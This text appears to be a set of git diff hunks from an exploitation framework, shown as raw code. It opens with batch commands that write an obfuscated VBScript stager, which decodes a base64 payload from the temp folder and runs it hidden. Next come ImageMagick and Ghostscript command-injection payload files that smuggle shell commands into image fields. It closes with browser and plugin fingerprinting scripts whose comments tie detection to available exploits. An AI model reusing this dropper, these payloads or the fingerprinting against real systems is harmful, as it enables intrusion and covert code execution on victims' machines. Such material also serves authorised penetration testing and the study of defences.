+echo Function mimedecode(byVal strIn) >>decode_stub
+echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
+echo If Len(strIn) = 0 Then >>decode_stub
+echo mimedecode = -1 : Exit Function >>decode_stub
+echo Else >>decode_stub
+echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
+echo End If >>decode_stub
+echo End Function >>decode_stub
@@ -0,0 +1,49 @@
+echo Dim encodedFile, decodedFile, scriptingFS, scriptShell, emptyString, tempString, Base64Chars, tempDir >>decode_stub
+echo encodedFile = Chr(92)+CHRENCFILE >>decode_stub
+echo decodedFile = Chr(92)+CHRDECFILE >>decode_stub
+echo scriptingFS = Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(79)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116) >>decode_stub
+echo scriptShell = Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(83)+Chr(104)+Chr(101)+Chr(108)+Chr(108) >>decode_stub
+echo emptyString = Chr(84)+Chr(104)+Chr(101)+Chr(32)+Chr(102)+Chr(105)+Chr(108)+Chr(101)+Chr(32)+Chr(105)+Chr(115)+Chr(32)+Chr(101)+Chr(109)+Chr(112)+Chr(116)+Chr(121)+Chr(46)>>decode_stub
+echo tempString  = Chr(37)+Chr(84)+Chr(69)+Chr(77)+Chr(80)+Chr(37) >>decode_stub
+echo Base64Chars = Chr(65)+Chr(66)+Chr(67)+Chr(68)+Chr(69)+Chr(70)+Chr(71)+Chr(72)+Chr(73)+Chr(74)+Chr(75)+Chr(76)+Chr(77)+Chr(78)+Chr(79)+Chr(80)+Chr(81)+Chr(82)+Chr(83)+Chr(84)+Chr(85)+Chr(86)+Chr(87)+Chr(88)+Chr(89)+Chr(90)+Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+Chr(103)+Chr(104)+Chr(105)+Chr(106)+Chr(107)+Chr(108)+Chr(109)+Chr(110)+Chr(111)+Chr(112)+Chr(113)+Chr(114)+Chr(115)+Chr(116)+Chr(117)+Chr(118)+Chr(119)+Chr(120)+Chr(121)+Chr(122)+Chr(48)+Chr(49)+Chr(50)+Chr(51)+Chr(52)+Chr(53)+Chr(54)+Chr(55)+Chr(56)+Chr(57)+Chr(43)+Chr(47) >>decode_stub
+echo Set wshShell = CreateObject(scriptShell) >>decode_stub
+echo tempDir = wshShell.ExpandEnvironmentStrings(tempString) >>decode_stub
+echo Set fs = CreateObject(scriptingFS) >>decode_stub
+echo Set file = fs.GetFile(tempDir+encodedFile) >>decode_stub
+echo If file.Size Then >>decode_stub
+echo Set fd = fs.OpenTextFile(tempDir+encodedFile, 1) >>decode_stub
+echo data = fd.ReadAll >>decode_stub
+echo data = Replace(data, Chr(32)+vbCrLf, nil) >>decode_stub
+echo data = Replace(data, vbCrLf, nil) >>decode_stub
+echo data = base64_decode(data) >>decode_stub
+echo fd.Close >>decode_stub
+echo Set ofs = CreateObject(scriptingFS).OpenTextFile(tempDir+decodedFile, 2, True) >>decode_stub
+echo ofs.Write data >>decode_stub
+echo ofs.close >>decode_stub
+echo wshShell.run tempDir+decodedFile, 0, false >>decode_stub
+echo Else >>decode_stub
+echo Wscript.Echo emptyString >>decode_stub
+echo End If >>decode_stub
+echo Function base64_decode(byVal strIn) >>decode_stub
+echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
+echo For n = 1 To Len(strIn) Step 4 >>decode_stub
+echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
+echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
+echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
+echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
+echo If Not w2 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
+echo If  Not w3 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
+echo If Not w4 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
+echo Next >>decode_stub
+echo base64_decode = strOut >>decode_stub
+echo End Function >>decode_stub
+echo Function mimedecode(byVal strIn) >>decode_stub
+echo If Len(strIn) = 0 Then >>decode_stub
+echo mimedecode = -1 : Exit Function >>decode_stub
+echo Else >>decode_stub
+echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
+echo End If >>decode_stub
+echo End Function >>decode_stub
@@ -0,0 +1,41 @@
+echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
+echo Set file = fs.GetFile("ENCODED") >>decode_stub
+echo If file.Size Then >>decode_stub
+echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
+echo data = fd.ReadAll >>decode_stub
+echo data = Replace(data, vbCrLf, "") >>decode_stub
+echo data = base64_decode(data) >>decode_stub
+echo fd.Close >>decode_stub
+echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("DECODED", 2, True) >>decode_stub
+echo ofs.Write data >>decode_stub
+echo ofs.close >>decode_stub
+echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
+echo shell.run "DECODED", 0, false >>decode_stub
+echo Wscript.sleep(1000 * 60 * 5) >>decode_stub
+echo Else >>decode_stub
+echo Wscript.Echo "The file is empty." >>decode_stub
+echo End If >>decode_stub
+echo Function base64_decode(byVal strIn) >>decode_stub
+echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
+echo For n = 1 To Len(strIn) Step 4 >>decode_stub
+echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
+echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
+echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
+echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
+echo If Not w2 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
+echo If  Not w3 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
+echo If Not w4 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
+echo Next >>decode_stub
+echo base64_decode = strOut >>decode_stub
+echo End Function >>decode_stub
+echo Function mimedecode(byVal strIn) >>decode_stub
+echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
+echo If Len(strIn) = 0 Then >>decode_stub
+echo mimedecode = -1 : Exit Function >>decode_stub
+echo Else >>decode_stub
+echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
+echo End If >>decode_stub
+echo End Function >>decode_stub
@@ -0,0 +1,14 @@
+id=ImageMagick  version=1.0
+class=DirectClass  colors=0  matte=False
+columns=1  rows=1  depth=16
+colorspace=sRGB
+page=1x1+0+0
+rendering-intent=Perceptual
+gamma=0.454545
+red-primary=0.64,0.33  green-primary=0.3,0.6  blue-primary=0.15,0.06
+white-point=0.3127,0.329
+date:create=2016-05-04T00:19:42-05:00
+date:modify=2016-05-04T00:19:42-05:00
+label={";echo vulnerable"}
+
+:ÿÿÿÿÿÿ
@@ -3,6 +3,6 @@ encoding "UTF-8"
 viewbox 0 0 1 1
 affine 1 0 0 1 0 0
 push graphic-context
-image Over 0,0 1,1 'https://localhost";echo vulnerable > /dev/tty"'
+image Over 0,0 1,1 'https://localhost";echo vulnerable"'
 pop graphic-context
 pop graphic-context
@@ -1,4 +0,0 @@
-%!PS
-currentdevice null true mark /OutputICCProfile (%pipe%echo vulnerable > /dev/tty)
-.putdeviceparams
-quit
@@ -1,5 +1,5 @@
 <?xml version="1.0" encoding="UTF-8" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve">  <image id="image0" width="1" height="1" x="0" y="0"
-    xlink:href="&#x68;&#x74;&#x74;&#x70;&#x73;&#x3a;&#x2f;&#x2f;&#x6c;&#x6f;&#x63;&#x61;&#x6c;&#x68;&#x6f;&#x73;&#x74;&#x22;&#x3b;echo vulnerable > /dev/tty&#x22;" />
+    xlink:href="&#x68;&#x74;&#x74;&#x70;&#x73;&#x3a;&#x2f;&#x2f;&#x6c;&#x6f;&#x63;&#x61;&#x6c;&#x68;&#x6f;&#x73;&#x74;&#x22;&#x3b;echo vulnerable&#x22;" />
 </svg>
@@ -0,0 +1,14 @@
+id=ImageMagick  version=1.0
+class=DirectClass  colors=0  matte=False
+columns=1  rows=1  depth=16
+colorspace=sRGB
+page=1x1+0+0
+rendering-intent=Perceptual
+gamma=0.454545
+red-primary=0.64,0.33  green-primary=0.3,0.6  blue-primary=0.15,0.06
+white-point=0.3127,0.329
+date:create=2016-05-04T00:19:42-05:00
+date:modify=2016-05-04T00:19:42-05:00
+label={";touch vulnerable"}
+
+:ÿÿÿÿÿÿ
@@ -3,6 +3,6 @@ encoding "UTF-8"
 viewbox 0 0 1 1
 affine 1 0 0 1 0 0
 push graphic-context
-image Over 0,0 1,1 '|echo vulnerable > /dev/tty'
+image Over 0,0 1,1 '|touch vulnerable'
 pop graphic-context
 pop graphic-context
@@ -1,5 +1,5 @@
 <?xml version="1.0" encoding="UTF-8" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve">  <image id="image0" width="1" height="1" x="0" y="0"
-    xlink:href="&#x7c;echo vulnerable > /dev/tty" />
+    xlink:href="&#x7c;touch vulnerable" />
 </svg>
@@ -0,0 +1,89 @@
+var ie_addons_detect = { };
+
+/**
+ * Returns true if this ActiveX is available, otherwise false.
+ * Grabbed this directly from browser_autopwn.rb
+ **/
+ie_addons_detect.hasActiveX = function (axo_name, method) {
+  var axobj = null;
+  if (axo_name.substring(0,1) == String.fromCharCode(123)) {
+    axobj = document.createElement("object");
+    axobj.setAttribute("classid", "clsid:" + axo_name);
+    axobj.setAttribute("id", axo_name);
+    axobj.setAttribute("style", "visibility: hidden");
+    axobj.setAttribute("width", "0px");
+    axobj.setAttribute("height", "0px");
+    document.body.appendChild(axobj);
+    if (typeof(axobj[method]) == 'undefined') {
+      var attributes = 'id="' + axo_name + '"';
+      attributes += ' classid="clsid:' + axo_name + '"';
+      attributes += ' style="visibility: hidden"';
+      attributes += ' width="0px" height="0px"';
+      document.body.innerHTML += "<object " + attributes + "></object>";
+      axobj = document.getElementById(axo_name);
+    }
+  } else {
+    try {
+      axobj = new ActiveXObject(axo_name);
+    } catch(e) {
+      // If we can't build it with an object tag and we can't build it
+      // with ActiveXObject, it can't be built.
+      return false;
+    };
+  }
+  if (typeof(axobj[method]) != 'undefined') {
+    return true;
+  }
+
+  return false;
+};
+
+/**
+ * Returns the version of Microsoft Office. If not found, returns null.
+ **/
+ie_addons_detect.getMsOfficeVersion = function () {
+  var version;
+  var types = new Array();
+  for (var i=1; i <= 5; i++) {
+    try {
+      types[i-1] = typeof(new ActiveXObject("SharePoint.OpenDocuments." + i.toString()));
+    }
+    catch (e) {
+      types[i-1] = null;
+    }
+  }
+
+  if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
+      types[3] == 'object' && types[4] == 'object')
+  {
+    version = "2012";
+  }
+  else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
+           types[3] == 'object' && types[4] == null)
+  {
+    version = "2010";
+  }
+  else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
+           types[3] == null && types[4] == null)
+  {
+    version = "2007";
+  }
+  else if (types[0] == 'object' && types[1] == 'object' && types[2] == null &&
+           types[3] == null && types[4] == null)
+  {
+    version = "2003";
+  }
+  else if (types[0] == 'object' && types[1] == null && types[2] == null &&
+           types[3] == null && types[4] == null)
+  {
+    // If run for the first time, you must manullay allow the "Microsoft Office XP"
+    // add-on to run. However, this prompt won't show because the ActiveXObject statement
+    // is wrapped in an exception handler.
+    version = "xp";
+  }
+  else {
+    version = null;
+  }
+
+  return version;
+}
@@ -0,0 +1,157 @@
+var misc_addons_detect = { };
+
+
+/**
+ * Detects whether the browser supports Silverlight or not
+ **/
+misc_addons_detect.hasSilverlight = function () {
+	var found = false;
+
+	//
+	// When on IE, we can use AgControl.AgControl to actually detect the version too.
+	// But this ability is specific to IE, so we fall back to just true/false response
+	//
+	try {
+		var ax = new ActiveXObject('AgControl.AgControl');
+		found = true;
+	} catch(e) {}
+
+	//
+	// ActiveX didn't get anything, try looking in MIMEs
+	//
+	if (!found) {
+		var mimes = window.navigator.mimeTypes;
+		for (var i=0; i < mimes.length; i++) {
+			if (/x\-silverlight/.test(mimes[i].type)) {
+				found = true;
+				break;
+			}
+		}
+	}
+
+	//
+	// MIMEs didn't work either. Try navigator.
+	//
+	if (!found) {
+		var count = navigator.plugins.length;
+		for (var i=0; i < count; i++) {
+			var pluginName = navigator.plugins[i].name;
+			if (/Silverlight Plug\-In/.test(pluginName)) {
+				found = true;
+				break;
+			}
+		}
+	}
+
+	return found;
+}
+
+/**
+ * Returns the Adobe Flash version
+**/
+misc_addons_detect.getFlashVersion = function () {
+	var foundVersion = null;
+
+	//
+	// Gets the Flash version by using the GetVariable function via ActiveX
+	//
+	try {
+		var ax = new ActiveXObject('ShockwaveFlash.ShockwaveFlash').GetVariable('$version').toString();
+		foundVersion = ax.match(/[\d,]+/g)[0].replace(/,/g, '.')
+	} catch (e) {}
+
+	//
+	// This should work fine for most non-IE browsers
+	//
+	if (foundVersion == null) {
+		var mimes = window.navigator.mimeTypes;
+		for (var i=0; i<mimes.length; i++) {
+			var pluginDesc = mimes[i].enabledPlugin.description.toString();
+			var m = pluginDesc.match(/Shockwave Flash [\d\.]+/g);
+			if (m != null) {
+				foundVersion = m[0].match(/\d.+/g)[0];
+				break;
+			}
+		}
+	}
+
+	//
+	// Detection for Windows + Firefox
+	//
+	if (foundVersion == null) {
+		var pluginsCount = navigator.plugins.length;
+		for (i=0; i < pluginsCount; i++) {
+			var pluginName = navigator.plugins[i].name;
+			var pluginVersion = navigator.plugins[i].version;
+			if (/Shockwave Flash/.test(pluginName) && pluginVersion != undefined) {
+				foundVersion = navigator.plugins[i].version;
+				break;
+			}
+		}
+	}
+
+	return foundVersion;
+}
+
+/**
+ * Returns the Java version
+ **/
+misc_addons_detect.getJavaVersion = function () {
+	var foundVersion = null;
+
+	//
+	// This finds the Java version from Java WebStart's ActiveX control
+	// This is specific to Windows
+	//
+	for (var i1=0; i1 < 10; i1++) {
+	for (var i2=0; i2 < 10; i2++) {
+	for (var i3=0; i3 < 10; i3++) {
+	for (var i4=0; i4 < 10; i4++) {
+		var version = String(i1) + "." + String(i2) + "." + String(i3) + "." + String(i4);
+		var progId = "JavaWebStart.isInstalled." + version;
+		try {
+			new ActiveXObject(progId);
+			return version;
+		}
+		catch (e) {
+			continue;
+		}		
+	}}}}
+
+	//
+	// This finds the Java version from window.navigator.mimeTypes
+	// This seems to work pretty well for most browsers except for IE
+	//
+	if (foundVersion == null) {
+		var mimes = window.navigator.mimeTypes;
+		for (var i=0; i<mimes.length; i++) {
+			var m = /java.+;version=(.+)/.exec(mimes[i].type);
+			if (m) {
+				var version = parseFloat(m[1]);
+				if (version > foundVersion) {
+					foundVersion = version;
+				}
+			}
+		}
+	}
+
+	//
+	// This finds the Java version from navigator plugins
+	// This is necessary for Windows + Firefox setup, but the check isn't as good as the mime one.
+	// So we do this last.
+	//
+	if (foundVersion == null) {
+		var foundJavaString = "";
+		var pluginsCount = navigator.plugins.length;
+		for (i=0; i < pluginsCount; i++) {
+			var pluginName = navigator.plugins[i].name;
+			var pluginVersion = navigator.plugins[i].version;
+			if (/Java/.test(pluginName) && pluginVersion != undefined) {
+				foundVersion = navigator.plugins[i].version;
+				break;
+			}
+		}
+	}
+
+	return foundVersion;
+}
@@ -0,0 +1,831 @@
+// Case matters, see lib/msf/core/constants.rb
+// All of these should match up with constants in ::Msf::HttpClients
+var clients_opera  = "Opera";
+var clients_ie     = "MSIE";
+var clients_ff     = "Firefox";
+var clients_chrome = "Chrome";
+var clients_safari = "Safari";
+
+// All of these should match up with constants in ::Msf::OperatingSystems
+var oses_linux     = "Linux";
+var oses_android   = "Android";
+var oses_windows   = "Windows";
+var oses_mac_osx   = "Mac OS X";
+var oses_apple_ios = "iOS";
+var oses_freebsd   = "FreeBSD";
+var oses_netbsd    = "NetBSD";
+var oses_openbsd   = "OpenBSD";
+
+// All of these should match up with the ARCH_* constants
+var arch_armle    = "armle";
+var arch_x86      = "x86";
+var arch_x86_64   = "x86_64";
+var arch_ppc      = "ppc";
+var arch_mipsle   = "mipsle";
+
+var os_detect = {};
+
+/**
+ * This can reliably detect browser versions for IE and Firefox even in the
+ * presence of a spoofed User-Agent.  OS detection is more fragile and
+ * requires truthful navigator.appVersion and navigator.userAgent strings in
+ * order to be accurate for more than just IE on Windows.
+ **/
+os_detect.getVersion = function(){
+	//Default values:
+	var os_name;
+	var os_vendor;
+	var os_device;
+	var os_flavor;
+	var os_sp;
+	var os_lang;
+	var ua_name;
+	var ua_version;
+	var arch = "";
+	var useragent = navigator.userAgent;
+	// Trust but verify...
+	var ua_is_lying = false;
+
+	var version = "";
+	var unknown_fingerprint = null;
+
+	var css_is_valid = function(prop, propCamelCase, css) {
+		if (!document.createElement) return false;
+		var d = document.createElement('div');
+		d.setAttribute('style', prop+": "+css+";")
+		return d.style[propCamelCase] === css;
+	}
+
+	var input_type_is_valid = function(input_type) {
+		if (!document.createElement) return false;
+		var input = document.createElement('input');
+		input.setAttribute('type', input_type);
+		return input.type == input_type;
+	}
+
+	//--
+	// Client
+	//--
+	if (window.opera) {
+		ua_name = clients_opera;
+		if (!navigator.userAgent.match(/Opera/)) {
+			ua_is_lying = true;
+		}
+		// This seems to be completely accurate, e.g. "9.21" is the return
+		// value of opera.version() when run on Opera 9.21
+		ua_version = opera.version();
+		if (!os_name) {
+			// The 'inconspicuous' argument is there to give us a real value on
+			// Opera 6 where, without it, the return value is supposedly
+			// 'Hm, were you only as smart as Bjorn Vermo...'
+			// though I have not verfied this claim.
+			switch (opera.buildNumber('inconspicuous')) {
+				case "344":   // opera-9.0-20060616.1-static-qt.i386-en-344
+				case "1347":  // Opera 9.80 / Ubuntu 10.10 (Karmic Koala)
+				case "2091":  // opera-9.52-2091.gcc3-shared-qt3.i386.rpm
+				case "2444":  // opera-9.60.gcc4-shared-qt3.i386.rpm
+				case "2474":  // Opera 9.63 / Debian Testing (Lenny)
+				case "4102":  // Opera 10.00 / Ubuntu 8.04 LTS (Hardy Heron)
+				case "6386":  // 10.61
+					os_name = oses_linux;
+					break;
+				case "1074":  // Opera 11.50 / Windows XP
+				case "1100":  // Opera 11.52 / Windows XP
+				case "3445":  // 10.61
+				case "3516":  // Opera 10.63 / Windows XP
+				case "7730":  // Opera 8.54 / Windows XP
+				case "8502":  // "Opera 9 Eng Setup.exe"
+				case "8679":  // "Opera_9.10_Eng_Setup.exe"
+				case "8771":  // "Opera_9.20_Eng_Setup.exe"
+				case "8776":  // "Opera_9.21_Eng_Setup.exe"
+				case "8801":  // "Opera_9.22_Eng_Setup.exe"
+				case "10108": // "Opera_952_10108_en.exe"
+				case "10467": // "Opera_962_en_Setup.exe"
+				case "10476": // Opera 9.63 / Windows XP
+				case "WMD-50433": // Windows Mobile - "Mozilla/5.0 (Windows Mobile; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 10.00"
+					os_name = oses_windows;
+					break;
+				case "2480":  // Opera 9.64 / FreeBSD 7.0
+					os_name = oses_freebsd;
+					break;
+				case "6386":  // 10.61
+					os_name = oses_mac_osx;
+					break;
+				case "1407":
+					// In the case of mini versions, the UA is quite a bit
+					// harder to spoof, so it's correspondingly easier to
+					// trust. Unfortunately, despite being fairly truthful in
+					// what OS it's running on, Opera mini seems to lie like a
+					// rug in regards to the browser version.
+					//
+					// iPhone, iOS 5.0.1
+					//  Opera/9.80 (iPhone; Opera Mini/7.1.32694/27.1407; U; en) Presto/2.8.119 Version/11.10.10
+					// Android 2.3.6, opera mini 7.1
+					//  Opera/9.80 (Android; Opera Mini/7.29530/27.1407; U; en) Presto/2.8.119 Version/11.101.10
+					if (navigator.userAgent.indexOf("Android")) {
+						os_name = oses_android;
+					} else if (navigator.userAgent.indexOf("iPhone")) {
+						os_name = oses_apple_ios;
+						os_device = "iPhone";
+					}
+					break;
+				// A few are ambiguous, record them here
+				case "1250":
+					// Opera 9.80 / Windows XP
+					// Opera 11.61 / Windows XP
+					// Opera 11.61 / Debian 4.0 (Etch)
+					break;
+				default:
+					unknown_fingerprint = opera.buildNumber('inconspicuous');
+					break;
+			}
+		}
+	} else if (typeof window.onmousewheel != 'undefined' && ! (typeof ScriptEngineMajorVersion == 'function') ) { // IE 10 now has onmousewheel
+
+		// Then this is webkit, could be Safari or Chrome.
+		// Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1
+		// Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
+		// Mozilla/5.0 (Linux; U; Android 2.2; en-au; GT-I9000 Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
+		// Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2_1 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Mobile/8C148
+		// Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405
+		// Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3
+
+		// Google Chrome has window.google (older versions), window.chromium (older versions), and window.window.chrome (3+)
+		if (window.chromium || window.google || window.chrome) {
+			ua_name = clients_chrome;
+			search = "Chrome";
+		} else {
+			ua_name = clients_safari;
+			search = "Version";
+		}
+
+		platform = navigator.platform.toLowerCase();
+		// Just to be a pain, iPod and iPad both leave off "Safari" and
+		// "Version" in the UA, see example above.  Grab the webkit version
+		// instead.  =/
+		if (platform.match(/ipod/)) {
+			os_name = oses_apple_ios;
+			os_device = "iPod";
+			arch = arch_armle;
+			search = "AppleWebKit";
+		} else if (platform.match(/ipad/)) {
+			os_name = oses_apple_ios;
+			os_device = "iPad";
+			arch = arch_armle;
+			search = "AppleWebKit";
+		} else if (platform.match(/iphone/)) {
+			os_name = oses_apple_ios;
+			os_device = "iPhone";
+			arch = arch_armle;
+		} else if (platform.match(/macintel/)) {
+			os_name = oses_mac_osx;
+			arch = arch_x86;
+		} else if (platform.match(/linux/)) {
+			os_name = oses_linux;
+
+			if (platform.match(/x86_64/)) {
+				arch = arch_x86_64;
+			} else if (platform.match(/arm/)) {
+				arch = arch_armle;
+			} else if (platform.match(/x86/)) {
+				arch = arch_x86;
+			} else if (platform.match(/mips/)) {
+				arch = arch_mipsle;
+			}
+
+			// Android overrides Linux
+			if (navigator.userAgent.match(/android/i)) {
+				os_name = oses_android;
+			}
+		} else if (platform.match(/windows/)) {
+			os_name = oses_windows;
+		}
+
+		ua_version = this.searchVersion(search, navigator.userAgent);
+		if (!ua_version || 0 == ua_version.length) {
+			ua_is_lying = true;
+		}
+	} else if (navigator.oscpu && !document.all && navigator.taintEnabled || 'MozBlobBuilder' in window) {
+		// Use taintEnabled to identify FF since other recent browsers
+		// implement window.getComputedStyle now.  For some reason, checking for
+		// taintEnabled seems to cause IE 6 to stop parsing, so make sure this
+		// isn't IE first.
+
+		// Also check MozBlobBuilder because FF 9.0.1 does not support taintEnabled
+
+		// Then this is a Gecko derivative, assume Firefox since that's the
+		// only one we have sploits for.  We may need to revisit this in the
+		// future.  This works for multi/browser/mozilla_compareto against
+		// Firefox and Mozilla, so it's probably good enough for now.
+		ua_name = clients_ff;
+		// Thanks to developer.mozilla.org "Firefox for developers" series for most
+		// of these.
+		// Release changelogs: http://www.mozilla.org/en-US/firefox/releases/
+		if ('closest' in Element.prototype) {
+			ua_version = '35.0';
+		} else if ('matches' in Element.prototype) {
+			ua_version = '34.0';
+		} else if ('RadioNodeList' in window) {
+			ua_version = '33.0';
+		} else if ('copyWithin' in Array.prototype) {
+			ua_version = '32.0';
+		} else if ('fill' in Array.prototype) {
+			ua_version = '31.0';
+		} else if (css_is_valid('background-blend-mode', 'backgroundBlendMode', 'multiply')) {
+			ua_version = '30.0';
+		} else if (css_is_valid('box-sizing', 'boxSizing', 'border-box')) {
+			ua_version = '29.0';
+		} else if (css_is_valid('flex-wrap', 'flexWrap', 'nowrap')) {
+			ua_version = '28.0';
+		} else if (css_is_valid('cursor', 'cursor', 'grab')) {
+			ua_version = '27.0';
+		} else if (css_is_valid('image-orientation',
+		                 'imageOrientation',
+		                 '0deg')) {
+			ua_version = '26.0';
+		} else if (css_is_valid('background-attachment',
+		                 'backgroundAttachment',
+		                 'local')) {
+			ua_version = '25.0';
+		} else if ('DeviceStorage' in window && window.DeviceStorage &&
+				'default' in window.DeviceStorage.prototype) {
+			// https://bugzilla.mozilla.org/show_bug.cgi?id=874213
+			ua_version = '24.0';
+		} else if (input_type_is_valid('range')) {
+			ua_version = '23.0';
+		} else if ('HTMLTimeElement' in window) {
+			ua_version = '22.0';
+		} else if ('createElement' in document &&
+		           document.createElement('main') &&
+		           document.createElement('main').constructor === window['HTMLElement']) {
+			ua_version = '21.0';
+		} else if ('imul' in Math) {
+			ua_version = '20.0';
+		} else if (css_is_valid('font-size', 'fontSize', '23vmax')) {
+			ua_version = '19.0';
+		} else if ('devicePixelRatio' in window) {
+			ua_version = '18.0';
+		} else if ('createElement' in document &&
+		           document.createElement('iframe') &&
+		           'sandbox' in document.createElement('iframe')) {
+			ua_version = '17.0';
+		} else if ('mozApps' in navigator && 'install' in navigator.mozApps) {
+			ua_version = '16.0';
+		} else if ('HTMLSourceElement' in window &&
+		           HTMLSourceElement.prototype &&
+		           'media' in HTMLSourceElement.prototype) {
+			ua_version = '15.0';
+		} else if ('mozRequestPointerLock' in document.body) {
+			ua_version = '14.0';
+		} else if ('Map' in window) {
+			ua_version = "13.0";
+		} else if ('mozConnection' in navigator) {
+			ua_version = "12.0";
+		} else if ('mozVibrate' in navigator) {
+			ua_version = "11.0";
+		} else if (css_is_valid('-moz-backface-visibility', 'MozBackfaceVisibility', 'hidden')) {
+			ua_version = "10.0";
+		} else if ('doNotTrack' in navigator) {
+			ua_version = "9.0";
+		} else if ('insertAdjacentHTML' in document.body) {
+			ua_version = "8.0";
+		} else if ('ondeviceorientation' in window && !('createEntityReference' in document)) {
+			ua_version = "7.0";
+		} else if ('MozBlobBuilder' in window) {
+			ua_version = "6.0";
+		} else if ('isGenerator' in Function) {
+			ua_version = "5.0";
+		} else if ('isArray' in Array) {
+			ua_version = "4.0";
+		} else if (document.readyState) {
+			ua_version = "3.6";
+		} else if (String.trimRight) {
+			ua_version = "3.5";
+		} else if (document.getElementsByClassName) {
+			ua_version = "3";
+		} else if (window.Iterator) {
+			ua_version = "2";
+		} else if (Array.every) {
+			ua_version = "1.5";
+		} else {
+			ua_version = "1";
+		}
+		if (navigator.oscpu != navigator.platform) {
+			ua_is_lying = true;
+		}
+		// oscpu is unaffected by changes in the useragent and has values like:
+		//    "Linux i686"
+		//    "Windows NT 6.0"
+		// haven't tested on 64-bit Windows
+		version = navigator.oscpu;
+		if (version.match(/i.86/)) {
+			arch = arch_x86;
+		}
+		if (version.match(/x86_64/)) {
+			arch = arch_x86_64;
+		}
+		if (version.match(/Windows/)) {
+			os_name = oses_windows;
+			// Technically these will mismatch server OS editions, but those are
+			// rarely used as client systems and typically have the same exploit
+			// characteristics as the associated client.
+			switch(version) {
+				case "Windows NT 5.0": os_name = "Windows 2000"; break;
+				case "Windows NT 5.1": os_name = "Windows XP"; break;
+				case "Windows NT 5.2": os_name = "Windows 2003"; break;
+				case "Windows NT 6.0": os_name = "Windows Vista"; break;
+				case "Windows NT 6.1": os_name = "Windows 7"; break;
+				case "Windows NT 6.2": os_name = "Windows 8"; break;
+				case "Windows NT 6.3": os_name = "Windows 8.1"; break;
+			}
+		}
+		if (version.match(/Linux/)) {
+			os_name = oses_linux;
+		}
+		// end navigator.oscpu checks
+  } else if (typeof ScriptEngineMajorVersion == "function") {
+		// Then this is IE and we can very reliably detect the OS.
+		// Need to add detection for IE on Mac.  Low priority, since we
+		// don't have any sploits for it yet and it's a very low market
+		// share.
+		os_name = oses_windows;
+		ua_name = clients_ie;
+		version_maj   = ScriptEngineMajorVersion().toString();
+		version_min   = ScriptEngineMinorVersion().toString();
